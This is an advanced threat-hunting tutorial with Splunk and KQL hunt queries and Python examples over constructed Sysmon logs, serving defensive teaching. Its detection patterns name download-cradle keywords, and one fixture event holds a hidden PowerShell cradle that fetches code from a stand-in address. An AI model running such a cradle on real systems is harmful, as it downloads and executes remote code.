Threat Hunting Fundamentals

Level: advanced · Duration: 45 min · Type: Writeup

Proactively searching for threats

Learning Objectives

  • Understand threat hunting
  • Develop hunting hypotheses
  • Use MITRE ATT&CK for hunting
  • Document and report findings

Threat Hunting is the proactive search for threats that have evaded automated detection. While SOC analysts wait for alerts, threat hunters actively look for hidden adversaries. It's like going from alarm-based security to actively patrolling for intruders.

Think of it as the difference between a home alarm and a security guard doing rounds. The alarm only triggers when something specific happens. The guard looks for anything suspicious - an open window, a car circling the block, anything that doesn't fit the pattern. Threat hunters look for anomalies that detections miss.

Hunt Assumes Compromise

Threat hunting operates under the assumption that adversaries are already in the network. You're not hoping to find nothing - you're expecting to find something and proving yourself wrong.

Hunting vs Detection

```text
Threat Hunting vs Alert-Based Detection:

ALERT-BASED DETECTION
─────────────────────────────────────────────────────────────────
├── Reactive: Wait for rules to trigger
├── Known threats: Detects what rules define
├── Automated: Runs continuously
├── Scalable: Handles volume well
└── Limitation: Can't catch unknown TTPs

THREAT HUNTING
─────────────────────────────────────────────────────────────────
├── Proactive: Actively search for threats
├── Unknown threats: Finds what rules miss
├── Human-driven: Analyst expertise required
├── Hypothesis-based: Test theories about attacks
└── Output: New detections, validated or disproved hypotheses

COMPLEMENTARY APPROACHES
─────────────────────────────────────────────────────────────────
Detection finds known bad (rules)
Hunting finds unknown bad (anomalies)
Together = comprehensive coverage

Example:
├── Detection rule: "PowerShell with -EncodedCommand"
├── Hunting query: "What PowerShell ran without detection?"
└── Result: Find new evasion technique → Create new rule
```

Hypothesis-Driven Hunting

```text
Hypothesis-Driven Hunting Framework:

THE HUNTING LOOP
─────────────────────────────────────────────────────────────────
 ┌─────────────────────────────────────────┐
 │ 1. CREATE HYPOTHESIS                    │
 │ "Attackers may be using X technique"    │
 └───────────────────┬─────────────────────┘
                     ▼
 ┌─────────────────────────────────────────┐
 │ 2. INVESTIGATE                          │
 │ Search data, analyze patterns           │
 └───────────────────┬─────────────────────┘
                     ▼
 ┌─────────────────────────────────────────┐
 │ 3. IDENTIFY PATTERNS/ANOMALIES          │
 │ Find evidence supporting hypothesis     │
 └───────────────────┬─────────────────────┘
                     ▼
 ┌─────────────────────────────────────────┐
 │ 4. RESPOND OR TUNE                      │
 │ Incident? → Respond                     │
 │ Normal?   → Document baseline           │
 │ Gap?      → Create detection            │
 └───────────────────┬─────────────────────┘
                     ▼
                 (Repeat)

HYPOTHESIS SOURCES
─────────────────────────────────────────────────────────────────
├── Threat Intelligence: APT29 uses X technique
├── MITRE ATT&CK: Hunt for T1059.001 gaps
├── Red Team findings: What did the pentest bypass?
├── Industry reports: Ransomware groups doing Y
├── Anomaly alerts: Investigate unusual patterns
└── Experience: "Something feels off about..."

GOOD HYPOTHESIS EXAMPLES
─────────────────────────────────────────────────────────────────
"Attackers may be using LOLBins for execution"
"Data may be exfiltrating via DNS tunneling"
"Persistence may exist via scheduled tasks"
"Lateral movement may be occurring via WMI"

BAD HYPOTHESIS EXAMPLES
─────────────────────────────────────────────────────────────────
"Find all the hackers" (too vague)
"Look at everything" (not actionable)
"Check if we're secure" (not specific)
```

Hunting with MITRE ATT&CK

```text
Using ATT&CK for Threat Hunting:

STEP 1: IDENTIFY TECHNIQUE TO HUNT
─────────────────────────────────────────────────────────────────
Choose based on:
├── Threat intel (what APTs use against your sector)
├── Detection gaps (what you can't currently detect)
├── High-impact techniques (credential access, exfil)
└── Prevalence in incidents

STEP 2: UNDERSTAND THE TECHNIQUE
─────────────────────────────────────────────────────────────────
For T1059.001 (PowerShell):
├── How is it used by attackers?
├── What are the variations?
├── What artifacts does it leave?
└── What data sources capture it?

STEP 3: FORM HYPOTHESIS
─────────────────────────────────────────────────────────────────
"Attackers may be using PowerShell to download
and execute payloads while evading our detection."

STEP 4: BUILD HUNT QUERY
─────────────────────────────────────────────────────────────────
Splunk example (the backslash in the path is doubled inside the quoted string):
index=sysmon EventCode=1 Image="*\\powershell.exe"
  (CommandLine="*IEX*" OR CommandLine="*DownloadString*"
   OR CommandLine="*WebClient*" OR CommandLine="*Invoke-*")
| stats count by ComputerName, User, CommandLine

STEP 5: ANALYZE RESULTS
─────────────────────────────────────────────────────────────────
├── Review each result
├── Is it malicious or legitimate?
├── Can we baseline legitimate usage?
└── What variations did we miss?

STEP 6: ACTION
─────────────────────────────────────────────────────────────────
Found malicious? → Incident response
Found gap? → Create detection rule
Found nothing? → Document, try a different angle
```

Hunt Query Examples

```sql
-- HUNTING QUERIES (Splunk SPL format)
-- Backslashes inside quoted SPL strings are doubled ("*\\powershell.exe").
-- Wildcard filters go in the search clause: in "| where", field="*x*" is an
-- exact comparison and never matches.

-- HUNT: Unusual Parent-Child Process Relationships
-- Hypothesis: Attackers spawn shells from unexpected parents
index=sysmon EventCode=1
| eval parent_child=ParentImage."|".Image
| stats count by parent_child
| where count < 5
| sort count

-- HUNT: PowerShell Download Cradles
-- Hypothesis: Attackers download payloads via PowerShell
index=sysmon EventCode=1 Image="*\\powershell.exe"
| where match(CommandLine, "(?i)(iex|invoke-expression|downloadstring|webclient|bitstransfer)")
| table _time, ComputerName, User, CommandLine

-- HUNT: Rare Scheduled Tasks
-- Hypothesis: Attackers create tasks for persistence
index=sysmon EventCode=1
  (ParentImage="*\\schtasks.exe" OR CommandLine="*schtasks*/create*")
| stats count by CommandLine
| where count < 3

-- HUNT: Lateral Movement via WMI
-- Hypothesis: Attackers use WMI for remote execution
index=sysmon EventCode=1 ParentImage="*\\WmiPrvSE.exe"
| stats count by ComputerName, User, Image, CommandLine

-- HUNT: Unusual Outbound Connections
-- Hypothesis: C2 over non-standard ports
index=firewall action=allow direction=outbound
| where NOT match(dest_port, "^(80|443|53|25)$")
| stats count by src_ip, dest_ip, dest_port
| where count > 100

-- HUNT: DNS Tunneling
-- Hypothesis: Data exfiltration via DNS
index=dns
| eval query_length=len(query)
| where query_length > 50
| stats count, avg(query_length) by src_ip
| where count > 100
```

```kql
// Elastic KQL equivalents

// Unusual PowerShell
event.code: 1 AND process.name: "powershell.exe" AND
process.command_line: (*DownloadString* OR *IEX* OR *WebClient*)

// WMI Remote Execution
event.code: 1 AND process.parent.name: "WmiPrvSE.exe"

// Scheduled Task Creation
event.code: 1 AND process.command_line: *schtasks* AND
process.command_line: */create*
```
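The Step 4 PowerShell query and the SPL/KQL hunts above, carried out in Python over a constructed batch of Sysmon Event ID 1 records so the filtering and counting can be followed end to end. This is an added example, not code from the original course; the events, hosts, users, paths and the 203.0.113.5 address (TEST-NET-3) are constructed, and the thresholds (fewer than 5 parent/child occurrences, fewer than 3 task creations) are the ones the queries use.

```python
import re
from collections import Counter

# Constructed Sysmon Event ID 1 (process creation) records using the same field
# names as the Splunk queries (ComputerName, User, ParentImage, Image, CommandLine).
EXPLORER = "C:\\Windows\\explorer.exe"
CMD = "C:\\Windows\\System32\\cmd.exe"
POWERSHELL = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
WINWORD = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
SCHTASKS = "C:\\Windows\\System32\\schtasks.exe"
WMIPRVSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
SVCHOST = "C:\\Windows\\System32\\svchost.exe"


def _event(host, user, parent, image, cmdline):
    return {"ComputerName": host, "User": user, "ParentImage": parent,
            "Image": image, "CommandLine": cmdline}


EVENTS = (
    # explorer -> cmd on six hosts: common, must not surface as rare
    [_event(f"WS-0{i}", "CORP\\alice", EXPLORER, CMD, "cmd.exe /c dir") for i in range(1, 7)]
    # Office spawning a shell: seen once
    + [_event("WS-03", "CORP\\bob", WINWORD, CMD, "cmd.exe /c whoami")]
    # a download cradle matching the hunt regex (constructed, TEST-NET-3 address)
    + [_event("WS-03", "CORP\\bob", CMD, POWERSHELL,
              "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")]
    # benign admin PowerShell: must not match the cradle hunt
    + [_event("WS-01", "CORP\\alice", EXPLORER, POWERSHELL, "powershell Get-ChildItem C:\\Temp")]
    # a scheduled task created once, pointing at a user-writable path
    + [_event("WS-03", "CORP\\bob", CMD, SCHTASKS,
              "schtasks /create /tn WindowsUpdateTask /tr C:\\Users\\Public\\svc.exe /sc onlogon")]
    # identical task creation on three hosts: a vendor updater, not rare
    + [_event(f"WS-0{i}", "NT AUTHORITY\\SYSTEM", SVCHOST, SCHTASKS,
              "schtasks /create /tn VendorUpdateTask /tr \"C:\\Program Files\\Vendor\\update.exe\" /sc daily")
       for i in range(1, 4)]
    # child of the WMI provider host on a server: remote-execution candidate
    + [_event("SRV-DC01", "CORP\\bob", WMIPRVSE, POWERSHELL, "powershell -c hostname")]
)

CRADLE_RE = re.compile(r"(?i)(iex|invoke-expression|downloadstring|webclient|bitstransfer)")
TASK_CREATE_RE = re.compile(r"(?i)schtasks.*/create")


def _base(path):
    """Executable name without its directory, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def rare_parent_child(events, threshold=5):
    """'stats count by parent_child | where count < 5': pairs seen fewer than threshold times."""
    counts = Counter(f"{_base(e['ParentImage'])}|{_base(e['Image'])}" for e in events)
    return {pair: n for pair, n in counts.items() if n < threshold}


def powershell_download_cradles(events):
    """powershell.exe command lines containing download-cradle indicators."""
    return [(e["ComputerName"], e["User"], e["CommandLine"]) for e in events
            if _base(e["Image"]) == "powershell.exe" and CRADLE_RE.search(e["CommandLine"])]


def rare_task_creations(events, threshold=3):
    """schtasks /create command lines (or children of schtasks.exe) seen fewer than threshold times."""
    counts = Counter(e["CommandLine"] for e in events
                     if _base(e["ParentImage"]) == "schtasks.exe"
                     or TASK_CREATE_RE.search(e["CommandLine"]))
    return {cmd: n for cmd, n in counts.items() if n < threshold}


def wmi_remote_execution(events):
    """Processes whose parent is WmiPrvSE.exe, the hallmark of remote WMI execution."""
    return [(e["ComputerName"], e["User"], _base(e["Image"]), e["CommandLine"])
            for e in events if _base(e["ParentImage"]) == "wmiprvse.exe"]


def run_hunts(events):
    return {
        "rare_parent_child": rare_parent_child(events),
        "download_cradles": powershell_download_cradles(events),
        "rare_task_creations": rare_task_creations(events),
        "wmi_children": wmi_remote_execution(events),
    }


if __name__ == "__main__":
    for hunt, findings in run_hunts(EVENTS).items():
        print(f"== {hunt}: {len(findings)} result(s)")
        for f in (findings.items() if isinstance(findings, dict) else findings):
            print("  ", f)
```

Each function mirrors one query: the parent/child hunt keys on executable names rather than full paths so that the same pair installed under different directories is counted together, and the vendor task shows why the count thresholds matter: it matches the `/create` pattern but is seen on three hosts, so it drops out of the rare set while the single `WindowsUpdateTask` creation remains.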

Anomaly-Based Hunting

```text
Anomaly-Based Hunting Approaches:

BASELINE COMPARISON
─────────────────────────────────────────────────────────────────
Concept: Establish normal, find deviations

Example: Login times
1. Baseline: Users typically log in between 8 AM and 6 PM
2. Hunt: Find logins at 3 AM
3. Analyze: Is it an attacker or a legitimate exception?

Query (Splunk; strftime returns a string, so convert before comparing):
index=windows EventCode=4624
| eval hour=tonumber(strftime(_time, "%H"))
| where hour < 6 OR hour > 20
| stats count by user, hour
| sort -count

FIRST-TIME OCCURRENCE
─────────────────────────────────────────────────────────────────
Concept: Alert on "first time ever" events

Examples:
├── User logs into server for first time
├── New service installed on DC
├── First connection to external IP
└── New scheduled task on workstation

Query (Splunk; search a long history window, otherwise every pair looks new):
index=windows EventCode=4624 LogonType=10 earliest=-90d
| stats earliest(_time) as first_seen by user, dest
| where first_seen > relative_time(now(), "-24h")

STATISTICAL ANOMALIES
─────────────────────────────────────────────────────────────────
Concept: Find outliers from the normal distribution

Examples:
├── User with 10x normal data transfer
├── Process with unusual network volume
├── Host with spike in DNS queries
└── Account with abnormal login frequency

Query (Splunk):
index=proxy
| stats sum(bytes_out) as total by src_ip
| eventstats avg(total) as avg_bytes, stdev(total) as stdev_bytes
| where total > (avg_bytes + (3 * stdev_bytes))

RARE OCCURRENCES
─────────────────────────────────────────────────────────────────
Concept: Investigate things that rarely happen

Examples:
├── Rare process names
├── Unusual port combinations
├── Uncommon user-agent strings
└── Infrequent command combinations
```
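The three query-backed approaches above (baseline comparison, first-time occurrence and statistical outliers) as an added Python example that is not part of the original page. The logon and proxy records are constructed, `NOW` is a fixed clock standing in for `now()`, and the function names are my own; the thresholds (06:00 to 20:00, a 24-hour first-seen window, mean plus three standard deviations) are the ones the queries use.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from math import sqrt
from statistics import mean, stdev

# Constructed clock so the example is deterministic (the queries use now()).
NOW = datetime(2024, 7, 15, 12, 0, 0)


def _logon(ts, user, dest, logon_type=10):
    """One Windows 4624 record reduced to the fields the queries use."""
    return {"_time": ts, "user": user, "dest": dest, "LogonType": logon_type}


# Constructed logon history: hosts, users and times are made up.
LOGONS = (
    # bob RDPs to the file server every morning at 09:00 for the last 30 days
    [_logon(NOW - timedelta(days=d, hours=3), "CORP\\bob", "SRV-FILE01") for d in range(1, 31)]
    # a backup service account logs on nightly at 03:00: off-hours, but a known exception
    + [_logon(NOW - timedelta(days=d, hours=9), "CORP\\svc_backup", "SRV-FILE01") for d in range(1, 8)]
    # bob's first ever RDP logon to the domain controller, two hours ago
    + [_logon(NOW - timedelta(hours=2), "CORP\\bob", "SRV-DC01")]
    # a single 02:34 logon to a workstation, weeks ago
    + [_logon(datetime(2024, 6, 28, 2, 34), "CORP\\jsmith", "WORKSTATION-42")]
    # interactive console logons (type 2) during the day: out of scope for the RDP hunt
    + [_logon(NOW - timedelta(days=d, hours=1), "CORP\\alice", "WS-01", logon_type=2) for d in range(1, 6)]
)

# Constructed proxy records: two rows per source, 29 ordinary hosts and one heavy sender.
PROXY = [{"src_ip": f"10.0.0.{i}", "bytes_out": 400_000 + 5_000 * i}
         for i in range(1, 30) for _ in range(2)]
PROXY += [{"src_ip": "10.0.0.30", "bytes_out": 25_000_000} for _ in range(2)]


def off_hours_logons(logons, start_hour=6, end_hour=20):
    """BASELINE COMPARISON: (user, hour) counts for logons outside start_hour..end_hour."""
    counts = Counter((e["user"], e["_time"].hour) for e in logons
                     if e["_time"].hour < start_hour or e["_time"].hour > end_hour)
    return counts.most_common()


def first_time_logons(logons, now=NOW, window=timedelta(hours=24), logon_type=10):
    """FIRST-TIME OCCURRENCE: (user, dest) pairs whose earliest logon falls inside the window.
    The history passed in must reach well beyond the window, or every pair looks new."""
    earliest = {}
    for e in logons:
        if e["LogonType"] != logon_type:
            continue
        key = (e["user"], e["dest"])
        earliest[key] = min(earliest.get(key, e["_time"]), e["_time"])
    return sorted((u, d, t) for (u, d), t in earliest.items() if t > now - window)


def volume_outliers(rows, sigmas=3.0):
    """STATISTICAL ANOMALIES: sources whose total bytes_out exceed mean + sigmas * stdev.
    Uses the sample standard deviation, as Splunk's stdev() does."""
    totals = defaultdict(int)
    for r in rows:
        totals[r["src_ip"]] += r["bytes_out"]
    values = list(totals.values())
    threshold = mean(values) + sigmas * stdev(values)
    return sorted((ip, total) for ip, total in totals.items() if total > threshold)


def zscore_ceiling(n):
    """Largest z-score any single value can reach among n values (sample stdev): (n-1)/sqrt(n)."""
    return (n - 1) / sqrt(n)


if __name__ == "__main__":
    print("off-hours:", off_hours_logons(LOGONS))
    print("first-time RDP:", first_time_logons(LOGONS))
    print("volume outliers:", volume_outliers(PROXY))
    print("3-sigma needs at least", next(n for n in range(2, 100) if zscore_ceiling(n) > 3), "sources")
```

The off-hours hunt surfaces the backup account alongside the one-off 02:34 logon, which is exactly the "attacker or legitimate exception" decision the text describes: the recurring nightly entry belongs in the baseline, the single one does not. `zscore_ceiling` encodes a caveat worth knowing before running the three-sigma query: with the sample standard deviation no single value among n can sit more than (n-1)/√n deviations from the mean, so the outlier query cannot flag anything at all when it is run over ten or fewer sources, however extreme one of them is.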

Hunt Scenarios

```text
Example Hunt: Persistence Mechanisms

HYPOTHESIS
─────────────────────────────────────────────────────────────────
"Attackers may have established persistence via registry
Run keys that are not flagged by our current detections."

DATA SOURCES
─────────────────────────────────────────────────────────────────
├── Sysmon Event 12/13/14 (Registry)
├── Windows Security Event 4657
└── EDR registry telemetry

HUNT QUERIES
─────────────────────────────────────────────────────────────────
Splunk (the "." wildcard stands in for the path backslash, which would
otherwise need escaping twice inside an eval string):
index=sysmon EventCode=13
| where match(TargetObject, "(?i)(currentversion.run|policies.explorer.run)")
| stats count by ComputerName, TargetObject, Details
| sort -count

ANALYSIS
─────────────────────────────────────────────────────────────────
For each result:
├── Is the executable path legitimate?
├── Is it in an unusual location (Temp, Downloads)?
├── Is the filename suspicious?
├── Does the hash exist in threat intel?
└── Is this baseline for this system?

FINDINGS EXAMPLE
─────────────────────────────────────────────────────────────────
MALICIOUS FOUND:
├── WORKSTATION-42
├── Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
├── Value: "SecurityUpdate"
├── Data: "C:\Users\Public\Downloads\svc.exe"
└── Action: Incident Response initiated

FALSE POSITIVE:
├── All workstations
├── Key: HKLM\...\Run
├── Value: "Defender"
├── Data: "C:\Program Files\Windows Defender\..."
└── Action: Add to baseline/whitelist
```
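The Run-key hunt and its ANALYSIS checklist as an added Python example (not the course's own code). The Sysmon Event ID 13 records, the SID, the hosts, the vendor path and the `BASELINE` allowlist are all constructed, and the verdict labels are my own; the regex is the query's pattern with the backslashes written out, which Python lets us do without the double-escaping problem.

```python
import re
from collections import defaultdict

# Python regexes: "\\" is one literal backslash, so this is the SPL query's pattern plus
# a trailing group that captures the value name written under the Run key.
RUN_KEY_RE = re.compile(r"(?i)(currentversion\\run|policies\\explorer\\run)\\([^\\]+)$")
USER_WRITABLE_RE = re.compile(r"(?i)\\(temp|downloads|public|appdata)\\")
TRUSTED_ROOT_RE = re.compile(r'(?i)^"?c:\\(program files( \(x86\))?|windows)\\')

# Constructed allowlist of (value name, lower-cased path prefix) pairs accepted in earlier hunts.
BASELINE = {("Defender", "c:\\program files\\windows defender\\")}

# Constructed Sysmon Event ID 13 (registry value set) records; SID, hosts and paths are made up.
HKU_RUN = ("HKU\\S-1-5-21-1000000001-1000000002-1000000003-1001"
           "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run")
HKLM_RUN = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
HKLM_POLICY_RUN = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"

EVENTS = [
    {"ComputerName": "WORKSTATION-42", "TargetObject": HKU_RUN + "\\SecurityUpdate",
     "Details": "C:\\Users\\Public\\Downloads\\svc.exe"},
    *[{"ComputerName": f"WS-0{i}", "TargetObject": HKLM_RUN + "\\Defender",
       "Details": "C:\\Program Files\\Windows Defender\\MSASCuiL.exe"} for i in range(1, 4)],
    {"ComputerName": "WS-02", "TargetObject": HKLM_POLICY_RUN + "\\Helper",
     "Details": "C:\\Program Files\\Vendor\\agent.exe"},
    # not a Run key: the hunt must drop it before triage
    {"ComputerName": "WS-01", "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\Foo\\Start",
     "Details": "DWORD (0x00000002)"},
]

# Triage order for the report: suspicious first, baseline last.
ORDER = {"suspicious": 0, "review": 1, "baseline": 2}


def classify(value_name, data, baseline=BASELINE):
    """Apply the ANALYSIS checklist to one Run-key value and return a verdict string."""
    if any(value_name.lower() == n.lower() and data.lower().startswith(p) for n, p in baseline):
        return "baseline"
    if USER_WRITABLE_RE.search(data):          # Temp, Downloads, Public, AppData
        return "suspicious: user-writable location"
    if not TRUSTED_ROOT_RE.match(data):        # neither Program Files nor Windows
        return "suspicious: unknown path"
    return "review: trusted root, not yet baselined"


def hunt_run_keys(events, baseline=BASELINE):
    """Keep Run-key writes, count how many hosts share each value, classify every hit."""
    hits = []
    hosts_per_value = defaultdict(set)
    for e in events:
        m = RUN_KEY_RE.search(e["TargetObject"])
        if not m:
            continue
        name, data = m.group(2), e["Details"]
        hits.append((e["ComputerName"], e["TargetObject"], name, data))
        hosts_per_value[(name, data)].add(e["ComputerName"])
    findings = [{"host": host, "key": key, "value": name, "data": data,
                 "hosts_with_same_value": len(hosts_per_value[(name, data)]),
                 "verdict": classify(name, data, baseline)}
                for host, key, name, data in hits]
    return sorted(findings, key=lambda f: (ORDER[f["verdict"].split(":")[0]], f["host"]))


if __name__ == "__main__":
    for f in hunt_run_keys(EVENTS):
        print(f"{f['verdict']:40} {f['host']:15} {f['value']} -> {f['data']} "
              f"(on {f['hosts_with_same_value']} host(s))")
```

The `hosts_with_same_value` count is the "is this baseline for this system?" question made measurable: a value present on every workstation with an identical path, like the Defender entry, is a candidate for the allowlist, whereas a value on a single host pointing into a user-writable folder is the pattern of the MALICIOUS FOUND example. Entries that pass every check but are not yet allowlisted are returned as "review" rather than silently accepted, so the baseline grows only through an analyst's decision.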

Documenting Hunts

```text
Hunt Documentation Template:

HUNT REPORT
═══════════════════════════════════════════════════════════════

Hunt ID: TH-2024-042
Hunt Name: Scheduled Task Persistence
Date: 2024-07-15
Hunter: Analyst Name
Status: Completed

HYPOTHESIS
─────────────────────────────────────────────────────────────────
Attackers may have created malicious scheduled tasks on
workstations for persistence that evade our current detections.

MITRE ATT&CK MAPPING
─────────────────────────────────────────────────────────────────
├── T1053.005 - Scheduled Task
└── TA0003 - Persistence

DATA SOURCES
─────────────────────────────────────────────────────────────────
├── Sysmon Event ID 1 (Process Creation)
├── Windows Security Event 4698 (Task Created)
└── Task Scheduler logs

SCOPE
─────────────────────────────────────────────────────────────────
├── Time range: Last 30 days
├── Systems: All workstations (2,500 endpoints)
└── Query execution: 4 hours

QUERIES USED
─────────────────────────────────────────────────────────────────
[Insert queries here]

FINDINGS
─────────────────────────────────────────────────────────────────
Total tasks reviewed: 342
Known legitimate: 320
New legitimate: 18
Suspicious: 3
Confirmed malicious: 1

MALICIOUS FINDING
─────────────────────────────────────────────────────────────────
System: WORKSTATION-42
Task Name: WindowsUpdateTask
Action: C:\Users\Public\svc.exe
Creation Time: 2024-06-28 02:34:00
Created By: jsmith
Status: Escalated to IR (INC-2024-089)

RECOMMENDATIONS
─────────────────────────────────────────────────────────────────
1. Create detection rule for tasks running from Public folder
2. Add baseline whitelist for legitimate tasks
3. Schedule recurring hunt quarterly
```

Hunt Methodology

Threat Hunting Workflow

1. Hypothesis: Form a specific, testable hypothesis
2. Plan: Identify data sources and queries needed
3. Execute: Run queries, collect results
4. Analyze: Review each finding for malicious activity
5. Respond: Escalate confirmed threats to IR
6. Improve: Create detections, update baselines
7. Document: Record findings and recommendations

Knowledge Check

Quick Quiz (question 1 of 3)

What is the primary difference between threat hunting and alert-based detection?

Challenges

Design a Threat Hunt

Challenge (advanced)

Design a threat hunt for MITRE ATT&CK technique T1059.001 (PowerShell). Include: hypothesis, data sources needed, a query, and what you would look for in results.


Key Takeaways

  • Hunting is proactive search; detection is reactive to rules
  • Form specific, testable hypotheses based on ATT&CK or threat intel
  • Hunting assumes breach - you're proving you're NOT compromised
  • Anomaly hunting: first-time events, rare occurrences, statistical outliers
  • Document everything - findings become future detections
  • Hunt output: confirmed threats, new detections, validated baselines